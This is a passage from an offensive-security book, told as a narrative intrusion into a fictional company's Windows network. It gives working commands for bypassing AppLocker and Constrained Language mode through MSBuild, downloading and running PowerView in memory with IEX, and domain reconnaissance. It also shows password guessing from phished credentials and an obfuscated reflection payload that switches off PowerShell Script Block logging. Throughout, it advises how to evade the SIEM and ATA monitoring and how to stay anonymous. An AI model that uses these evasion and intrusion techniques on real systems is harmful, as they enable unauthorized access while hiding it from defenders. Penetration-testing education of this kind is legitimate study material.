Build started 3/3/2018 7:59:01 PM.

Executing PS commands

Our code is thus running in FullLanguage mode as expected. So far,

so good. It is ready to be shipped to Strat Jumbo’s XenApp server. We
load it on one of the C2 machines and download it to our home folder (X:)
using good old Firefox.

We then run the same command as before, only this time from the
Open Dialog (Ctrl + O) on Firefox:

Awesome! We achieved PowerShell command execution in Full

Language mode and bypassed Applocker at the same time. Talk about a
double win!
Using the same code skeleton as before, we can chain simple
commands as follows:

Ps_instance.AddScript("net user");
Ps_instance.AddScript("ls c: | out-string");

We use the function AddCommand for single native PowerShell

cmdlets (get-process, start-service, etc.). Otherwise, we run AddScript
for executing script blocks, external binaries or chaining multiple cmdlets.
AddStatement() is equivalent to the “;” separator.

While this solution does provide a working bypass for the issues at
hand (Applocker and Constrained Language mode), it is simply not
practical to rebuild a project every time we launch a command. To address
that, we crank up our previous build code to include a PowerShell-like
console that interactively executes commands and displays the output.
Almost like the real PowerShell console.

The code for such a project can be found on Microsoft’s website

( It is just a matter of piecing it up together, overriding
certain classes and methods, and pasting it in the msbuild project shell
we created earlier.

I will not comment on it any further in this paragraph because it

presents little of interest from a security vantage point since it relies on
the same trick as earlier. You can download a full working script from the
book’s Github (

Much better! Now that we have a viable user experience, let’s go

through that PowerView script once more. We load it in memory exactly
as before, except that this time, the command goes through as expected:
# Create a browser object
PS X:\> $browser = New-Object System.Net.WebClient;

# Add support for the default proxy with cached user credentials
PS X:\> $browser.Proxy.Credentials

# Download and execute the PowerView script in memory

PS X:\> IEX($browser.DownloadString('

PS X:\>

Alright. Back to the reconnaissance business using PowerView.


For the sake of simplicity, I have included the real links in the snippets of
code used in this book. In a real-world scenario, consider hosting all
scripts in custom domains to lower the suspicion rate.

Given the length of data we are about to retrieve, we shall not inspect
it right away; rather, we will write results to multiple files and then upload
them to our C2 server for thorough analysis.

We start with the Get-NetUser command to fetch user information:

PS X:\> Get-NetUser | select name, lastlogontimestamp,

serviceprincipalname, admincount, memberof | Format-Table -Wrap
-AutoSize | out-file users.txt

The admincount is an interesting field as it gets incremented every

time a user elevates their privileges on a machine. It is not foolproof
because admin privileges may be lost over time for various reasons, but
this could help us locate domain users with local admin privileges.

The ServicePrincipalName will help us identify Kerberos service

accounts, but more on that later.

The memberof attribute lists groups attached to any given user.

Finally, the format-table avoids truncating long output strings, which

is the default PowerShell behavior.
We continue with fetching the group listing and membership. Do not
forget that our top priority is to locate developers working on the Strat
Accounting software. The Get-NetGroup command returns the full
dataset pertaining to a group (creation date, description, object unique
identifier, SID, etc.). Get-NetGroupMember, on the other hand, returns
user accounts attached to any given group submitted as input:

PS X:\> Get-NetGroup -FullData | select name, description |

Format-Table -Wrap -AutoSize | out-file groups.txt

PS X:\> Get-NetGroup | Get-NetGroupMember -FullData | select

GroupName, membername, description | Format-Table -Wrap -
AutoSize | out-file group_members.txt

We also retrieve group policy objects that characterize the domain,

such as the auditing policy, password policy, security settings, and so
on—in short, every bit of configuration put in place by the IT team:

PS X:\> gpresult -h gpo.html

Our next step is to list available shares, which is one of the most
important resources in a domain as it usually contains valuable
information ranging from passwords to actual business data.

If we are lucky, maybe Strat Accounting’s code is stored on a share

available to everyone.

PS X:\> Invoke-ShareFinder | out-file -append shares.txt

Finally, we retrieve some additional information on the current Citrix

server, such as a full list of running processes and services:

PS X:\> Get-Process -includeusername | Select-Object id, name,

username, path | Format-Table -Wrap -AutoSize | out-file

PS X:\> get-wmiobject win32_service -filter "state='running'"|

select name,processid,pathname | Format-Table -Wrap -AutoSize |
out-file services.txt

We upload these files to our C2 server for thorough analysis. If Citrix

so happens to forbid copy-paste operations, we can use or
setup our own web server to retrieve these files.

Now, what should we start with? Our ultimate goal is to locate

machines and users with access to Strat Accounting’s code, so it’s only
natural to start with group memberships.
We search for any keywords that might indicate developer teams in
the groups.txt file. There are too many entries to go through them
manually; we are talking about a company with almost 800 employees:

As you can see, Strat Jumbo uses code names from Game of Thrones
to refer to their biggest software projects. Below is a user membership
preview based on data gathered:

SNOW jack.bosa, jake.sparrow...

YGRITTE lizzie.dutch...

CERSEI mozzie.caffrey,lucilla.silvy...

TYRION neil.cobbo...

DAENERYS cassini.morini, carl.sagan...

RHAEGAR janet.mcintyre, rodolpho.schwatz, jim.marrot...

TYWIN tara.tomora...

BAELISH elise.first, anya.ivanova...

TORMUND ron.bilius, richard.darwin, david.stuart...

ARYA laura.stevens, monica.fourb...

While clever and certainly humorous to some degree, this

nonetheless adds another hoop to jump through. Weirdly enough, the
users we tricked through the phishing campaign all seem to belong to
three of these groups: ARYA, TORMUND and RHAEGAR.

Of course, the million-dollar question is: are any of these projects

remotely affiliated with Strat Accounting? I guess we will just have to go
back and fetch more information. Perhaps we can find a wiki website, pdf
documents in shares, email archives, etc.

Before doing so, however, it might be worthwhile to size up Strat

Jumbo’s security level. Are we talking about shit or complete shit?
We go through the GPO report (gpo.html), specifically the “security
settings” tabs in “User details” and “Computer configuration” menus:

Passwords are changed every 90 days and must meet strong

complexity rules. The lockout threshold is set to ten attempts, which rules
out any automated bruteforce attack.

This is all pretty standard; however, something clearly stands out in

GPO objects. Strat Jumbo turned on logging big time! Usually,
companies stick to the default Windows auditing policies, which only
registers a few event logs (successful logon, failed logon, account
lockout, etc.) and never think twice about it.

In the case of Strat Jumbo, however, many additional Windows events

are registered as well, such as file access violation, use of admin (or
special) privileges, changes of membership in privileged groups, loading
code into LSA, SID history manipulation52, etc.

To our dismay, we notice that PowerShell Script Block Logging is also

turned on. All of our previous commands were written to the event
manager! No need to be alarmed, though. Logs are rarely centralized to
a single location, let alone monitored for active malicious payloads...
except that Strat Jumbo seems to be doing just that!

Server logs are replicated to an offset location, which is evident by the
presence of nxlog++ (a software for log forwarding) in the active process

We should be careful with our lateral propagation not to leave too wide
a trail behind us. If we are lucky, these logs get piled on every day and
then deleted a month later without so much as a glance.

A less friendly scenario involves a team of sharp-eyed hawks

meticulously monitoring a 140” screen 24/7 for the slightest alert raised
by their top-notch machine learning monitoring tool.

As for the antivirus product, the only one that seems to be active is
Windows Defender, which is Microsoft’s built-in default antivirus. You
would think that it is a piece of cake to bypass it, but it will cause us some
headache later on.

Let’s take a moment to recap where we are. Currently, we are on a

Windows 2016 server, fully patched, with a decent password policy,
Applocker enabled, a disabled built-in administrator account, PowerShell
in constrained language, custom auditing policy, centralized logging…

Strat Jumbo is no joke after all. Yet here we are with a working shell
on their server by exploiting one of the most basic attacks: password
stealing. Another testimony to the power of human weakness.

That being said, it would be foolish to ignore the warning signs

flickering all around us. Strat Jumbo is not joking when it comes to
information security.

We take the wrong turn and they will hunt us like rabbits on a green
and open field. And this is only the tip of the iceberg. There may be more
products that we do not know of hiding deep within the infrastructure, like
packet inspection, event correlation, behavioral monitoring, etc.

In hindsight, it is a good thing that we avoided dropping an

Empire/Meterpreter shell on a hundred workstations through our phishing
email. The beacon-like behavior (regular packets to the same domain
name) would probably have been caught, either at the network or system
Since we are walking on such thin ice here, let’s not stay longer than
we need to in this snake’s nest. We have accounts belonging to three
dev groups. If we go through their combined Firefox bookmarks, browser
logs and personal folder, we should be able to get some documentation
explaining how Strat Jumbo’s dev teams are structured around the world,
and thus target users working on the Strat Accounting project.

To that end, we connect once more to the Citrix server using Laura’s

Except that we cannot get in. Laura’s password is rejected.

We try three other random credentials retrieved through phishing only

to face the same harsh error message. We could go through the thirty-
one remaining accounts, but I suppose you are starting to realize what
just happened.

Somewhere in the last eight hours, four accounts were blocked, or

more likely reset. The timing is indeed troubling. What are the odds of
having multiple accounts failing over such a small period of time?

Unlikely as it might seem, we need to start considering the odd, yet

plausible possibility that Strat Jumbo somehow got news of our intrusion
and decided to react swiftly. And as you can guess, that is not a good
Big brother is watching you
As a general rule, the human brain tends to push away negative
thoughts by quickly distracting itself with more mundane and joyful ideas.
However, when unwillingly put in front of a harsh and unpleasant
moment, the brain suddenly vomits back every negative outcome that it
can possibly think of, drowning you in despair and agony.

Being caught red-handed in a hacking attempt unleashes a series of

scenarios furiously running through your head, from a night raid by a
SWAT team to spending your life in jail and seeing your children once a
year on Christmas through a glass window.

But let’s cool down a bit. It is precisely in response to these gloomy

situations that we took the time to build a few servers and route traffic
through TOR or a safe VPN provider.

It may be uncomfortable to sit six hours in a cold train station or a

coffee chain that ironically struggles with its sole mission in life—making
decent coffee, but the price to pay is ridiculously low compared to the
other all-too-likely scenario: being handcuffed in the middle of the night.

Provided our anonymity platform and hacking infrastructure hold tight,

we should be relatively safe. So, let’s not worry too much about going to
jail and instead try to understand what happened here.

We launched a clean spam campaign to collect credentials using a

web page that could be displayed only once. The email was convincing
since we collected thirty-five passwords. Thirty-six hours later, we
connected to the extranet website (Citrix) using a private server located
in London, where a lot of the Strat Jumbo staff is located.

So far, nothing exceedingly suspicious. Maybe the phishing campaign

got detected or reported by some employee—but if companies started
resetting passwords after each phishing attempt, VIPs would fire the
whole IT department after a few weeks.

Plus, logs on our webserver show no unusual probing of the phishing

page. All traffic ended seventeen hours after the start of the campaign.
So that cannot be it...

Another key element to keep in mind is that our attacking server,

which was located in London, was not blacklisted after the event—we
can still access the Citrix platform.
Any decent investigator would have followed the trail of Laura’s
account to the Citrix server and discovered the msbuild file project we
dropped to bypass the Constrained Language mode. This element would
clearly indicate malicious intent and therefore cause the ban of the IP
from which the connection originated—our attacking server.

But this was not the case.

The security team apparently simply reset passwords in an urgent and

swift attempt to block or prevent a possible attack. Quick and tangible
actions to alleviate the symptoms rather than the root cause of the issue.

We give them a few days to see if they take any active measures
against our IP addresses (FrontGun server and phishing website). This
will give us a good insight into their incident response skills.


...Nothing. Not even a single IP packet.

Good. let’s continue our retrospective review. After landing on the

Citrix server, we played with Applocker rules and caused quite a few
errors. Maybe those triggered an alert of some kind.

Similarly, we might have tipped the blue team when we failed to

launch PowerView in Constrained Language mode. These errors could
hardly qualify as major incidents, but it was probably picked up by some
monitoring tool analyzing logs.

Then came the manual reconnaissance phase. We can discard all

local commands like “ipconfig”, “net localgroup” since these are native
commands that do not send any traffic and are not usually flagged by
security products (Windows Defender in this case).

Other NET commands like “net group /domain” and “net group
‘domain admins’ /domain”, on the other hand, do issue network packets
to the Domain Controller (DC). They request and write information on the
DC through the named pipe SAMR.

Think of it as a file created on the virtual share IPC$ (present by

default on all Windows machines) to exchange data between the
workstation and the remote server:
The server returns data describing security objects (accounts, groups,
domains, etc.) in a format that respects the Security Account Manager
Remote Protocol (SAMR):

While this is a perfectly legit way to interact with the system, the fact
is that SAMR is rarely used in a real-life environment. Most middleware
and applications usually request information from the DC with the more
common LDAP protocol.

IT admins, on the other hand, rely on commands like Get-ADuser and

Set-ADuser, part of the PowerShell AD administration modules. These
commands communicate with the AD DS Web Services using SOAP
(Web) requests on port 9389.

Unlikely as it may seem, given their auditing policies and very swift
response, we should not discard the possibility that Strat Jumbo could
indeed monitor and flag this unusual traffic targeting their DC.

These weak signals were exacerbated with loading PowerView and

launching full reconnaissance packets. Not only were these commands
logged, pushed to a single location, and thus potentially picked up by a
security product, but we launched the insanely noisy command “Invoke-

This script loops through all machines in the Active Directory domain
and connects to each of them to list their shares:

foreach ($server in $servers){

$counter = $counter + 1
Write-Verbose "[*] Enumerating server $server ($counter of
if(-not $NoPing){
$up = Test-Server -Server $server
$shares = Get-NetShare -HostName $server

We initiated as many share requests as there are servers. A single

user suddenly opening 60, 100 or 200 network sessions (event id 4624)
can easily cause any security alarm to scream its lungs out.

This must have been the final drop that forced the security team to
seriously wonder about previous weak signals, connect the dots in some
way, and decide to reset everybody’s password “just in case”.

Of course, this is just a hypothetical scenario based on pure and blind

speculation, but if we are lucky, we can partially confirm our account by
conducting a more thorough review of the data we retrieved from Strat

Security information and event management tools (SIEM), network

monitoring devices, threat intelligence tools, endpoint detection response
(EDR), deep packet inspection—all these shiny devices often have a
central management console to configure their policies and display pretty

These consoles, being just another corporate asset, are often tied to
the Windows Active Directory to authenticate admins. This avoids local
generic accounts and eases user management by placing admins in a
well-defined group. Some software even requires domain accounts to
retrieve information about workstations, user accounts, windows logs,

See where I am going with this? We were fortunate enough to retrieve

user accounts and group information before being knocked off the

All we need is to review them, looking for keywords referring to a

potential security team, well-known security vendors or log analysis
products, like “SOC” (for security operation center), “threat”, “Carbon
black”, “RSA”, “Qradar”, “DarkTrace”,”Vektra”, “SIEM”, etc.
This simple keyword search immediately reveals our true opponents:
Microsoft Advanced Threat Analysis53 and Qradar SIEM54.

QRADAR is an event security monitoring tool. It aggregates logs

forwarded by different systems (Windows, routers, Linux, etc.) and
matches them against pre-defined security rules. Admins, for instance,
may monitor the following well-known hacking scenarios:

• Successful authentications to multiple devices by one account

• Multiple authentication failures of the same account
• Multiple read access violations on a particular machine
• Port scanning (multiple port requests on one or different machines)
• Changing local or global privileged groups (domain admins,
administrators, etc.)
• Credential theft by looking for events related to Lsass manipulation
(Event ID 4614, 4610, 4611, and 4622)
• Etc.

Of course, we do not know which scenarios Strat Jumbo monitors, but

it likely includes classic PowerShell attacks since they bothered to turn
on Script Block Logging.

We need to be very careful with any off-the-shelf tools, as we can be

sure they have programmed alerts to flag strings like “Powerup”,“Invoke-
UserHunter”, “Powerview”, etc.

You think this is bad? Wait until you hear about Microsoft ATA55.

It is a platform that plugs into the Windows Active Directory traffic

looking for suspicious behavior.

It bases its analysis on two main logics: behavioral analysis and
popular attack signatures.

Behavioral analysis builds a base model over a month of learning and

ingesting normal AD traffic inside a particular corporate network. This
includes information on which users typically connect to which machines,
at what time, through which protocols, and the resources that are usually

After the learning period is over, any traffic that deviates to some
extent from this base model is flagged as suspicious. Our successive
authentications to multiple machines must have surely triggered the
behavioral analysis module, for instance56.

The attack signature module is similar to that of an antivirus solution

but operates on requests sent to the domain controller. ATA looks for
telltale signs indicating one of the following attacks:

• DNS Zone transfer

• SAMR reconnaissance (listing users, enumerating privileged
accounts, etc.)
• Pass the hash (replaying NTLM hash using psexec or WMI)
• Overpass the hash (replaying Kerberos tickets using NTLM)
• Pass the ticket
• Golden ticket requests (forging TGT tickets valid for ten years)

• Session enumeration (listing active users on a machine)
• DCSync (replicating password hashes from the DC)

I can almost hear you gasp. “How are we supposed to hack a

company without pass the hash and DCSync?” Well, this is the part
where we need to show some creativity!

One thing is for sure: attacking Strat Jumbo to get into G&S Trust may
not be the quick and easy path we anticipated it would be...
Back to the arena
“Death smiles at us all. All we can do is smile
Marcus Aurelius (Gladiator)
Back to square one. Well, not really. We now have a much better
understanding of Strat Jumbo’s security and that is very valuable. We
know more about some of the traps carefully laid out to catch intrusion
attempts and we are better equipped to avoid them.

While we can only speculate about which behavior Qradar is trained

to monitor, we can follow a more hands-on approach with ATA since
Microsoft offers a free trial version we can download and install in a lab.

Does it really detect all pass-the-hash techniques? Should we forget

about pass-the-ticket? Dumping NTDS.DIT? Or are there some knobs
that we should tweak in existing tools and techniques to fly under the

We will have trouble mimicking the entire Strat Jumbo system activity.
As such, our environment will probably only prove useful against ATA’s
signature module. Any attack payload that we devise will therefore have
a margin error—a chance of being detected by the behavior analysis

We will appreciate this margin error when it comes to observations we

make on the fly once we are inside the network (Which accounts do
admin typically use? How many concurrent sessions on any given
machine? And so forth.).

Any future command likely to trigger network traffic will thus first be
run in this lab environment before being executed on Strat Jumbo’s

I will switch back and forth between these two environments, so to

help you follow along, all commands executed in the test lab will have the
appropriate mention on the illustration.

Obviously, all of this work is for nothing if we cannot find a new way
inside Strat Jumbo’s network. So, let’s first tackle this problem before
puzzling over ATA and QRADAR.

Back to the drawing board. Currently, we have:

• Thirty-five expired passwords
• Information regarding various internal components: Windows AD,
auditing policy, groups, users, etc.
• A solid preview of Strat Jumbo’s monitoring capabilities.
The first reflex one might have is to launch a new phishing campaign
on the remaining target batch, or maybe change the current email’s
content to avoid tipping off the security team. But, if you feel a bit
adventurous today, we can gamble on a shortcut that may well land us
right back where we left off.

See, if we carefully study the thirty-five passwords already collected,

some intriguing patterns start to emerge:

• Ten passwords end with a single-digit number: AkRiV€ra8,

Molly_Dorian5, Ghettome*fair3, ...
• Six passwords end with a double-digit number: 5YadorChan09,
GabrielSanta89, LeilaClapton10, etc.
• Two passwords end with a special character followed by a letter:
BrotherArms_C, WishYouHere*A, etc.
• Two passwords contain the current month’s name:
Jumbo12March_, MarchStrat%,

Coincidence? I hardly believe so.

When a company pushes the boundaries of password policy rules by

forcing a 90-day password change, eight characters minimal length and
three character classes, the human mind naturally pushes back against
this form of mental oppression.

Simple physics.

For every action there is an equal and opposite reaction. Human

memory is finite. There are only so many passwords one can remember.
So, to cope with the mental stress induced by that little pop-up flickering
in the corner indicating that “it’s time to change that password again”,
people tend to come up with predictable mnemonic rules like
incrementing a number at the end (or the start), going through the
alphabet, including the current month’s name, etc.

This procedure ironically breaches a lesser known, but oh-so-

important password rule: forward secrecy. A given password should not
hint to other passwords used by the same user57.

57 Take a look at the new NIST guidelines for password policy:
Unless Strat Jumbo explicitly communicated their breach to
employees and stressed the importance of this hard password reset,
there is a good to fair chance that some users simply moved on to the
next password on their list.

Given how poorly they have handled this particular incident (no IP
blocking or probing of the phishing page), it is highly unlikely that the
security team conducted a proper forensic examination.

They probably saw a couple of alerts on ATA and QRadar—just

enough to suspect that something odd was going on—and decided to
reset everybody’s password as a preventive measure. So yes, we do
need a bit of luck, but the odds are definitely stacked on our side.

We manually test five potential account password combinations every

day. No rush.

We do not want to trigger any detection rule (too many failed attempts
or the same IP trying multiple accounts in a short time frame, etc.) much
less block an account. A single, carefully calculated password guess for
each account is all we need to test our hypothesis.

Soon enough, we land our lucky shot: Ron / AkRiV€ra9 (the previous
password being AkRiV€ra8).

What some might call a fluke or a lucky draw, I call an educated guess.
We were bound to find at least a couple of accounts that stuck to their
same pattern. People frequently form a special bond with their

And we are back in the game! Ron’s Citrix profile is almost empty. No
documents related to his programming activities are stored in his
personal folder and his Firefox is almost blank. This makes it all the more
exciting! Some privilege escalation is called for!

Through logs and fire

Before launching the slightest command on this server, we need to
devise a working strategy to avoid the armada of traps laying all around
us. These traps are fueled by many new techniques introduced by
Microsoft in its execution engine Windows Management Framework v5
(Windows 10 and 2016 Server) to counter the explosion of script-based

• Constrained Language mode forbids a number of special object

types and .NET functions as we previously saw: add-type, new-
object, .NET methods (e.g., [console]::writelint()), etc.58.

• Script Block logging: every PowerShell command or script can be

logged in its unencrypted, unobfuscated format in the Event
Manager (event 4101).

• System-wide transcript offers the ability to log text typed on the

console as well as the command’s output. It is an over-the-
shoulder experience for blue-teamers (defenders).

• The AMSI filter that intercepts every command or file executed

through regular scripting engines (JScript, PowerShell and
VBScript). An antivirus can plug into AMSI and decide whether to
block a command or not. This brings antivirus products into the
realm of memory scanning and protection59, since AMSI works at
the engine level regardless of the command’s origin (script on disk
or command in memory).

Script Block logging is probably the most dangerous and imminent

threat because it directly feeds QRadar’s ever-watching monitoring
engine. Simple string matching rules on obvious keywords could expose
us once more, so we need to deal with it immediately.

**Notes on system-wide transcript**

While System-Wide transcript offers an interesting over-the-shoulder

experience for security analysts, it is rarely used in real time to monitor
malicious traffic. The file’s output lacks structure—it is after all a real
console transcript—making it difficult to parse by monitoring engines. In
the end, it is mostly used in the post-incident analysis once the attack is

59Only Windows Defender, ESET, AVAST and AVG support AMSI for now
By default, transcript files are stored in the user’s personal folder, but
admins can (and should) store them in a separate and protected network

If that were the case in Strat Jumbo, we would have no choice but to locate
that share, gain enough privileges, and then surreptitiously alter the log
files to remove our activity trail60.

Script Block logging is pushed through GPO to Windows machines.

Each time the PowerShell interpreter executes a command, it checks the
corresponding GPO setting in a registry key and acts accordingly.

As usual, however, the devil lies in details. In order to improve

performance, the Script Block logging GPO setting is cached in memory,
specifically inside a private variable called
cachedGroupPolicySettings. This variable (or property) is defined in
the internal static class Utils loaded by the
System.Management.Automation DLL decompiled below61 (the same
one that implements all PowerShell functions).

Can we read this memory space and bypass the rules of object-
oriented programming (OOP) stating that private variables cannot be
accessed from outside their classes? Yes—and yes!

Even better, we can overwrite this field in memory to disable logging

for a particular PowerShell instance. After all, a DLL’s code loaded by a
regular user process is located in user space and variables within that
DLL usually reside in Read/Write memory pages. Therefore, we can
perform this operation without admin privileges!

61 Decompiling .NET binaries can be done through .NET Reflector
To achieve this little voodoo trick, we rely on a feature called
Reflection. Reflection allows a piece of code to read a binary’s metadata,
retrieve methods and members and alter them at run time. It is usually a
property of self-described binaries like .NET assemblies and Java

**Notes on .NET binaries**

A .NET binary is called an Assembly (even though it does not contain any
real native machine code) and is composed of MSIL code, which the
compiler translated from a high-level code (C# usually).

At run time, the MSIL code is compiled on-the-fly to machine code by the
Windows CLR (common language runtime). The concept is very similar
to Java bytecode if you will.

CLR is a stack-based machine (no concept of registers), that pushes

values to the stack and calls the appropriate function referenced by an
index (metadata token) in the MSIL code.

Whereas in a normal executable file, all metadata (function names,

variables, structures, etc.) are replaced by offsets and size information
upon compilation, these elements are preserved in the MSIL assembly,
making it possible to easily manipulate the binary’s internals at run time.

This is precisely what makes concepts like Reflection possible. For a

more extensive read about playing with MSIL code in .NET binaries
check out this Phrack article (

Traditionally in an unmanaged language (e.g., C++), to access

internal methods and properties of a class, we would use what we call in
object-oriented programming (OOP), accessors and setters.

The sole purpose of these functions—if implemented—is to allow

programmers to violate the OOP boundary rule and get (accessors) or
set (setters) values of internal variables from outside their classes.

Reflection, however, automatically provides us with accessors and

setters, whether the class defined them or not because, we can just read
the assembly’s metadata and locate the members and properties that we
want to retrieve and change. So, repeat after me: Reflection is awesome!

In PowerShell, to load a public .NET class, like Console, we simply

put it between brackets and directly access its public methods:
However, when dealing with an internal class like Utils, we must
manually locate it in the DLL assembly
System.Management.Automation.dll using Reflection. We do not need
to manually load the System.Management.Automation DLL, since
every PowerShell wrapper inherently does so.

A direct reference to this DLL can be found in the Assembly property

of the public class System.Management.Automation.PSReference:

The [System.Management.Automation.PSReference] can be

conveniently abbreviated [Ref]:

PS C:\examples\HLL> [ref].Assembly

Next, we call the GetType function which, thanks to Reflection,

retrieves a handle to the internal class Utils:

PS C:\examples\HLL>
Using this handle, we move on to fetching the
cachedGroupPolicySettings field within this class by calling the
GetField method. It expects the variable’s name and information about
its type—otherwise known as bindings flags—like Public, Nonpublic,
Static, Instance, etc.62.

As revealed earlier by the decompiler (.NET Reflector), the

cachedGroupPolicySettings property is declared as Private and Static,
hence the following code:

PS C:\examples\HLL>

The field type indicates that, as expected, we are dealing with a

dictionary (or array). We can display its values using the GetValue
method. Remember that functions like GetValue, GetType and GetField
only work because of Reflection in the first place:

PS C:\> $GPF =

PS C:\>$GPF.getValue("")

62 A good summary of the different ways to access internal .NET

resources using reflection can be found at the following link.
There we have it! We can clearly spot that stinky
EnableScriptBlockLogging set to “1”, a key we must change to zero in
order to trick PowerShell into silently dropping all subsequent commands
issued in this specific window63:

PS C:\> $GPF =

PS C:\> $GPF['ScriptBlockLogging']['EnableScriptBlockLogging']=0

When executing this script on the target machine, we need not worry
about ATA, since there is no communication with the DC. Qradar, on the
other hand, still poses a real threat. When you think about it, this bypass
command line is executed right before Script Block logging is disabled,
which means that it will inevitably be logged under event 4104:

Notice that unlike other 4104 events that were simply categorized as
“Verbose”, the one containing the Script Block logging bypass was
flagged as a “Warning”.

This is an unnecessary exposure that we should also get rid of in case

it triggers a detection rule.

This categorization of commands happens at the Windows

Management Framework engine (the one executing PowerShell

It relies on a list of suspicious strings to look for anything that happens

to be defined in the internal property “signatures” of the public class
ScriptBlock. Dangerous strings and functions, like “NonPublic”,
“GetField”, “Add-Type”, and many others, are automatically flagged by the
execution engine.

63 Every time we issue a script block command (invoke-command -scriptblock,

start-job -scriptblock and so forth), we must first issue the Script Block logging
bypass since a new PowerShell session is initiated.
Contrary to the Utils class, ScriptBlock is declared as public, so we
can directly reference it using the [ScriptBlock] object. However, the
“signatures” field containing the list of suspicious strings is private, so we
resort to Reflection once more using the GetField and GetValue methods:

PS C:\>

Since it is merely a string-based comparison, we can bypass it with

some clever obfuscation.

Daniel Bohannon did some awesome work on this particular matter.

His Invoke-Obfuscate tool is truly a fearsome demonstration of creativity
and hard work. Most, if not all, the techniques presented below are
borrowed from his talk at Blue Hat 2016 ( .

Based on the previous list, we know that the following strings are
flagged in our Script Block logging bypass command:
• GetField
• NonPublic
• ScriptBlockLogging

“NonPublic” and “ScriptBlockLogging” are simple strings, so classic

concatenation techniques will go a long way into preventing detection:

$GPF =
Field('cachedGroupPolicySettings', 'No'+'nPublic,Static')

$GPS = $GPF.GetValue($null)

$ GPS ['Scri'+'ptBlockLogging']['EnableScriptBlockLogging'] = 0

But what about the GetField method?

You would be surprised by the flexibility offered by PowerShell’s

syntax. A method call can be enclosed in double or single quotes and still
work perfectly fine:

Oh, but look at that! Now GetField is a string, so we can apply classic
concatenation techniques again:


And now for the grand finale, the cherry on top of this obfuscation
awesomeness—we can add tick marks (`) inside strings and still get
proper code execution.

The only constraint being that it should not precede one of the following
characters (0, a, b, f, n, r, t, v) lest it be interpreted as a special character
(resp. null, alert, backspace, form feed, new line, carriage return,
horizontal tab, vertical tab).


The special characters mentioned above are case sensitive, so

nothing forbids us from placing a tick mark in front of an uppercase F, for


The final Script Block logging code now looks like the following:

$GPF =
F`Ield"('cachedGroupPolicySettings', 'NonP'+'ublic,Static')

$GPS = $GPF.GetValue($null)

$GPS['Script'+'BlockLogging']['EnableS'+'criptBlockLogging'] = 0

onLoggi'+'ng'] = 0

When we run this command in our test lab, it gets logged as expected,
but it is assigned a low “verbose” level, thus drowning it in the midst of
thousand meaningless other verbose messages.

Moreover, the obfuscation techniques we’ve applied will likely bypass

any keyword monitoring performed by QRadar.
Every follow-up command we execute in the same PowerShell window
will no longer be logged64.

**Side note on Script Block logging**

On some Windows machines, the EnableScriptBlockLogging dictionary

key is not found in cachedGroupPolicySettings even though Script
Block logging is enabled—thus rendering the above bypass useless as it
is. To trick Windows into disabling logging anyway, we simply create the
missing key and then assign it a value of 0, as usual.

In this case, the alternative payload becomes:

$GPF =
F`Ield"('cachedGroupPolicySettings', 'NonP'+'ublic,Static')
$GPS = $GPF.GetValue($null)

#Create a new Dictionary object

$val =

#Populate the dictionary

$val.Add('EnableScriptB'+'lockLogging', 0)
$val.Add('EnableScriptB'+'lockInvocationLogging', 0)
rShell\ScriptB'+'lockLogging'] = $val

Finally, one *big* problem down. Big Brother is no longer judging each
command we type in the PowerShell command prompt. We can execute
almost anything we want on this machine. But what exactly? We have
already searched for potential passwords and documents stored locally
but got squat for our efforts.

64 Every new script block using Invoke-Command, Start-Job and similar

commands should include this bypass.
We are certain that there must passwords on network shares
somewhere. Hell, even old Windows 2008 machines likely vulnerable to
MS17-01065, except that we cannot go running after them like the candid
hacker we used to be.

We have sipped from the fountain of truth—and its taste is bitter. We

know there is a Damocles sword hanging over our heads in the form of
ATA and QRadar. One odd packet or inconsistent network behavior and
we get kicked out again—probably for good this time.

Instead of hazardously looking for ways to elevate our privileges, let’s

channel our energy back to our original goal: getting to Strat Accounting’s

Russian roulette
Whenever you feel like you’ve hit a dead end, always go back to
reconnaissance. Somewhere in the midst of those heaps of data, you will
always find something to kick start your creativity once again.

We’ve already got our hands on plenty of information, and at a great

cost, so we need to be more careful this time. The general rule to follow
when dealing with ATA or any other behavioral analysis tool is to blend
in as much as possible with regular traffic, or in this case, with Windows
Active Directory traffic.

For instance, all machines in the forest rely on the LDAP protocol to
request copies of AD objects (users, groups, machines, GPO, etc.) for
caching purposes. Thus, using LDAP to query users, groups and AD
objects in general should not trigger any alerts:

PS X:\>[adsisearcher]'(memberOf=CN=Domain

Obviously, dealing directly with the adsisearcher class to query
LDAP objects can easily create headaches, and that’s why we love
PowerView so much (most if not all Get-Net* functions rely on LDAP).
We only need to remember to disable Script Block logging before loading
it again as usual in memory and launching commands:


Another interesting technique that avoids sending network packets

altogether is to query the local WMI namespace where some domain
objects are cached (users and groups especially).

# List groups
PS> Get-WmiObject -class win32_groupindomain | select

# List active users

PS> Get-WmiObject -Class Win32_UserAccount -Filter
"Domain='stratjumbo' AND Disabled='False'"

One piece of information that we did not bother getting before was the
list of machines declared in Active Directory. Let’s set that straight, shall

PS X:\> Get-NetComputer -FullData |select cn, operatingsystem,

logoncount, lastlogon| Format-Table -Wrap -AutoSize

No help is to be expected here either. The servers’ names are cryptic

at best (if you remember, our Citrix server is called START-CI-01).
The impulsive pentester in your heart would probably like to perform
a massive port scan to identify which services are running on these
machines. Maybe a Tomcat with default credentials, an old SMB server,
admin console of a JBoss, etc. But I know that your brain is now
sufficiently trained to resist that foolish urge, and for good reason. We
would certainly be kicked out exactly five minutes after the tenth probe.

Port scanning floods the network with millions of packets targeting

each and every port available. It is hardly stealthy, no matter how many
Nmap options you turn on. So how do we perform a service
reconnaissance without individually probing each and every machine?

We turn our prayers to the all-knowing GOD of Active Directory: The

Domain Controller (DC)!

All services and applications running on Windows servers that would

like to support the Kerberos protocol to authenticate users must declare
a unique service principal name (SPN) in the DC. Think of it as a service’s
unique identifier.

The SPN contains not only the service’s name, but also—according
to official specifications66—its port number and the server it is running on.
The interesting part is that per Kerberos’ design, any authenticated user
can query the list of all valid SPNs.

PS X:\> Get-NetUser | select name,serviceprincipalname| Format-

Table -Wrap -AutoSize

So, there you have it. Simple port enumeration without drowning the
network with useless packets67. We now have a partial list of webservers
(STRAT-AK-02, STRAT-AK-01, etc.) and, more importantly, databases
(STRAT-CI-03, STRAT-CI-05, STRAT-AK-03, etc.) that seem to run
using domain accounts like sqlexpress and sqlexpress2.

67 More extensive read at
The obvious limitation is that we only get services that support
Kerberos authentication, such as some web servers (IIS, Tomcat, etc.),
SQL server databases, WinRM (remote PowerShell execution), RDP
(remote desktop session), Exchange, and so forth. But this simple
information can go a long way, as we will soon see.

Another limitation to keep in mind is the network filtering in place. We

can see that STRAT-AK-03 is hosting an SQL server database on port
1433, but nothing guarantees that we can actually reach this database
